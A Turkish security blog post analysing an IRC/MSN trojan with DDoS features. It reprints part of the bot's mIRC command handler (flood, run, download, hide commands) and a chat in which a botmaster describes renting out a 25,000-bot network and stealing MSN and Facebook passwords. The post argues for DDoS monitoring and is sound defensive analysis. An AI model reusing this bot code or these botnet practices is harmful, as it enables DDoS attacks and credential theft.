Botnet Gerçeği
Geçtiğimiz günlerde http://twitter.com/hack4career üzerinden yayınlanan bir kaç zararlı yazılımı (timunun.exe, scan.exe) incelediğimde karşıma yerli malı ddos saldırı özelliğine sahip, irc ve msn üzerinden haberleşebilen bir trojan çıkıverdi. Trojanın aldığı komutları incelediğimde reklam yapmadan, saldırı yapmaya kadar bir çok özelliği üzerinde barındırdığını gördüm.
if ($1 = !reklam) { .set %reklam $2- } if ($1 = !packet) { if ($2 = ddos) { //set %pchan # | if ($4 == random) { //fckrstart $3 $4 $r(1,65000) | halt } | //fckrstart $3 $4 $5 } } if ($1 = !Atak) { if ($2 !== $null) { srvmsg (Packet) (Yollaniyor) $2 Üzerinde $3 Toplam $4 Packet | synp start $4 $2 $3 } } if ($1 = !nreklam) { msg #x %reklam } if ($1 = !mesajnick) { .set %mesajnick $2- | echo -a #x Yeni Mesaj Atilacak Nick %mesajnick } if ($1 = !mesaj) { .mesaj } if ($1 = !settimer) { .set %timer $2- } if ($1 = !timer) { .timer31 %timer $2- } if ($1 = !timeroff) { .timer31 off } if ($1 = !gir) { .girgir } if ($1 = !Run) { srvmsg Running : $2- | .run $2- } if ($1 = !qir) { .girulen $2- } if ($1 = !q) { $2- } if ($1 = !Version) { .Anlat } if ($1 = !Down) { .Download $2- } if ($1 = !download) { .msg #x 4,1 I14,1c4,1eSh14,1o4,1cK Lamer Koruması .. | /server irc.xxxx.tr } if ($1 = !Clone) { .Clone $2- } if ($1 = !IdentClone) { .identclone $2- } if ($1 = !HideControl) { if ($appactive == $true) { msg #x Mirc Açik } | else { msg #x Mirc Kapali } } if ($1 = !Hide) { .dll ice32.dll do_ShowWindow $window(-2).hwnd 0 }
Trojanın konfigürasyon dosyasında yer alan IRC sunucusuna bağlandığım zaman ilk bakışta boş görünen bir sunucu olarak görünsede çok geçmeden botmaster ile yaptığım sohbet esnasında sunucu üzerinde tam tamına 25000 adet bot olduğunu ve bunların sadece 500 TL’ye kiralanabildiğini öğrendiğimde DDOS izleme ve önleme sistemlerinin önemi benim için daha da artmış oldu.
DDOS izleme ve önleme sistemlerini hayata geçirme konusunda kurum veya kuruluşlarınızda henüz bir ilerleme kaydetmediyseniz, yöneticilerinizi ikna etme adına örnek bulmakta zorlanıyorsanız sizlere yardımcı olma adına botmaster ile gerçekleştirmiş olduğum sohbeti sizlerle paylaşıyorum. Unutmadan, her ne kadar 41 antivirüs üreticisinden 31 tanesi bu zararlı yazılımları (timunun.exe, scan.exe, imbot.exe) tespit ediyor olsada antivirüs politikalarınızdaki istenmeyen program politikalarına bu dosyaları eklemenizde fayda olabilir. Bir sonraki yazıda görüşmek dileğiyle…
[20:32] <MS> güzel bot olmuş [20:33] <MS> hoşuma gitmedi desem yalan olur [20:34] <MS> çok fazla kişiye bulaşmamış ama sanırım [20:34] <********> buLaştır o zaman [20:35] <MS> yok yahu o benim işim değil [20:35] <********> senin işin ne [20:35] <MS> ben sadece bu tür zararlı yazılımları inceliyorum [20:35] <MS> kendin mi yazdın bu fuckers.jpg içinde yer alan tüm scripti ? [20:35] <********> evet [20:36] <MS> araklamadın yani ? [20:36] <********> arakLamışta oLabiLirim tam hatırLamıyorum çok eski [20:37] <MS> HTTP1.4 nedir bunuda ilk defa gördüm [20:37] <********> diğer gördükLerin neydi [20:37] <********> roxnet mi [20:37] <MS> yok roxnetide ilk defa duydum [20:38] <********> bu HTTP de oper oLmadan sunucuda hiçbir işLem yapamıyosun [20:38] <********> diğer Lerinden çok koLay bot çaLınıyor [20:38] <MS> kanaldakileride göremiyorsun sanırım [20:38] <MS> evet güzel bir yöntemmiş [20:38] <MS> http1.4 ü nereden indirebilirim ? [20:39] <********> googLe [20:39] <********> buLabiLirsin oradan [20:39] <********> botnetmi besLiceksin [20:39] <MS> yok hayır sadece nasıl çalıştığını merak ettim [20:40] <MS> google yapmıştım ama bulamamıştım [20:44] <MS> scan.exe ile imbot.exe ne iş yapıyor [20:45] <********> scan exe [20:45] <********> ispiyoncu bot özeLLiği var [20:45] <********> biLgisayardaki diğer virüsLeri buLup [20:45] <********> hangi serverda besLendikLerini [20:45] <********> veriyor [20:45] <********> imbot exe ise msn ve facebook şifresi veriyor [20:46] <MS> bunları sen mi yazdın ? [20:46] <********> ewet [20:47] <MS> hangi crypterı kullandın ? [20:48] <********> arkadaşa packer yaptırmıştım [20:48] <********> hmm [20:48] <********> sende varmı crtptr [20:48] <MS> yok maalesef [20:52] <MS> [email protected] kimin ? [20:52] <********> packer yapan arkadaşın [20:54] <MS> bu işi neden yapıyorsun ? para kazanıyor musun ? [20:54] <********> evet hazır kuruLu düzen oLarak satıyorum isteyen kişiLere [20:54] <********> aLan kişiLer farkLı amaçLar için kuLLanıyor [20:54] <MS> mesela ne gibi amaçlar ? [20:55] <********> meseLa web sitesi oLan sitesini günde binLerce kişiye ziyaret ettirebiLiyor [20:55] <MS> hitten para kazanıyor [20:55] <********> kimisi rakip siteye saLdırı yaparak o siteyi çökertiyor [20:55] <MS> ne zamandan beri bu işlerle uğraşıyorsun ? [20:55] <********> kimisi irc serverLere saLdırı yapıyor [20:55] <MS> ne kadar kiralama raici ? [20:56] <********> 500 TL [20:56] <********> isteğe göre değişiyor [20:56] <MS> aylık mı yıllık mı [20:56] <********> ömür boyu eLinin aLtında buLunucak şekiLde [20:57] <MS> yakalanma korkunuz yok mu ? [20:57] <********> :p [20:57] <MS> mesela ya ben polis olsaydım [20:57] <********> Sonunu düşünen kahraman oLamaz [20:59] <MS> alıcı var demek ya sözde fakirleşmiştik halk olarak ama :) [21:00] <MS> yai kaç 20-30 arası mı ? [21:00] <MS> yaş demek istedim [21:00] <********> 24 [21:01] <MS> öğrenci değilsin sanırım ? [21:01] <********> değiLim [21:01] <MS> ne kadar süredir bu işlerle uğraşıyorsun ? [21:01] <********> 6-7 Sene [21:02] <MS> bu zamana kadar bu işten ne kadar para kazanmışsındır kabaca ? [21:03] <********> oturduğum ev araba [21:03] <********> yediğim içtiğim vs vs. [21:03] <********> ;) [21:03] <MS> o kadar diyorsun yani [21:03] <********> 50k [21:03] <********> 25k Lık botnetLer [21:03] <********> satıyorum [21:03] <MS> inanması zor kanalda 1 tane var sadece [21:04] <********> kanaL +u [21:04] <********> sadece op oLan kişiyi görebiLirsin [21:04] <********> ;) [21:04] <MS> komutuna 1 tanesi yanıt verdi [21:04] <********> kanaL +Mm [21:05] <********> sadece o bot kanaLda op [21:05] <********> kanaL +Mm modunda oLduğu için [21:05] <********> diğerLeri yazamaz [21:05] <MS> bende tek op sen görünüyorsun ondan dedim [21:05] <MS> bu kanalda şimdi kaç bot var ? [21:05] <********> 403 [21:11] <MS> xxxx'da kaç bot var ? [21:11] <********> 895 [21:11] <********> topLamda 25 bin bot var [21:11] <********> resim göndericektim sana [21:11] <********> dur upLoad edebilirim [21:12] <MS> sunucunu kapatacaklardır yakında [21:12] <********> kapatsınLar yenisini açarım 10 dakkamı aLmaz [21:12] <********> ;) [21:12] <MS> botlara konfigürasyon nasıl geçeceksin ? [21:12] <MS> haberleşme ? [21:13] <********> ;) [21:50] <MS> bu botların hepsi türkiyeden mi ? [21:50] <********> * [RUS|00||803357] ([email protected]) Quit (Connection reset by peer) [21:50] <********> * [TUR|00|M|94088] ([email protected]) has joined #xxx [21:50] <********> * [TUR|00|MP|1458] ([email protected]) has joined #xxx [21:50] <********> * [USA|00|M|15992] ([email protected]) Quit (Ping timeout) [21:50] <********> * [ESP|00|MP|5424] ([email protected]) has joined #xxx [21:50] <********> * [TUR|00||628074] ([email protected]) Quit (Connection reset by peer) [21:50] <********> * [RUS|00|D|20753] ([email protected]) Quit (Connection reset by peer) [21:50] <********> * [RUS|00|UD|07067] ([email protected]) Quit (Ping timeout) [21:50] <********> * [ESP|00|D|45749] ([email protected]) Quit (Ping timeout) [21:50] <********> * [TUR|00|M|94088] ([email protected]) Quit (Ping timeout) [21:50] <********> * [TUR|00|P|78342] ([email protected]) Quit (Connection reset by peer) [21:50] <********> * [ESP|00|D|46676] ([email protected]) has joined #xxx [21:50] <********> * [ESP|00|M|58294] ([email protected]) has joined #xxx [21:50] <********> * [BRA|00|P|30821] ([email protected]) has joined #xxx [21:50] <********> * [TUR|00||423136] ([email protected]) Quit (Ping timeout) [21:50] <********> * [TUR|00|M|10638] ([email protected]) has joined #xxx [21:50] <********> * [TUR|00|P|17537] ([email protected]) has joined #xxx [21:50] <********> * [TUR|00|M|70509] ([email protected]) Quit (Connection reset by peer) [21:50] <********> * [TUR|00|P|84223] ([email protected]) has joined #xxx [21:50] <********> * [ESP|00|D|46676] ([email protected]) Quit (Ping timeout) [21:50] <********> * [ESP|02|MP|3357] ([email protected]) has joined #xxx [21:50] <********> * [ESP|00|M|58294] ([email protected]) Quit (Ping timeout) [21:50] <********> * [PRT|00|MD|2372] ([email protected]) Quit (Connection reset by peer) [21:50] <********> * [TUR|00|M|81825] ([email protected]) has joined #xxx [21:50] <********> * [USA|00|P|53894] ([email protected]) Quit (Connection reset by peer) [21:50] <********> * [TUR|00|P|83786] ([email protected]) Quit (Connection reset by peer) [21:50] <********> * [RUS|00|D|43169] ([email protected]) has joined #xxx [21:50] <********> * [TUR|00|M|81825] ([email protected]) Quit (Connection reset by peer) [21:50] <********> * [TUR|00|P|83485] ([email protected]) Quit (Ping timeout) [21:50] <********> * [TUR|00||767061] ([email protected]) Quit (Connection reset by peer) [21:50] <********> * [ESP|00|M|75075] ([email protected]) has joined #xxx [21:50] <********> * [ESP|00|D|79796] ([email protected]) has joined #xxx [21:50] <********> * [TUR|00|P|91644] ([email protected]) has joined #xxx [21:50] <********> * [TUR|00|MP|4601] ([email protected]) has joined #xxx [21:50] <********> * [TUR|00|MP|4750] ([email protected]) has joined #xxx [21:50] <********> * [MEX|00|P|57920] ([email protected]) has joined #xxx [21:50] <********> * [RUS|00|PD|7924] ([email protected]) Quit (Connection reset by peer) [21:50] <********> * [TUR|00|MP|4750] ([email protected]) Quit (Connection reset by peer) [21:51] <********> her üLke mevcut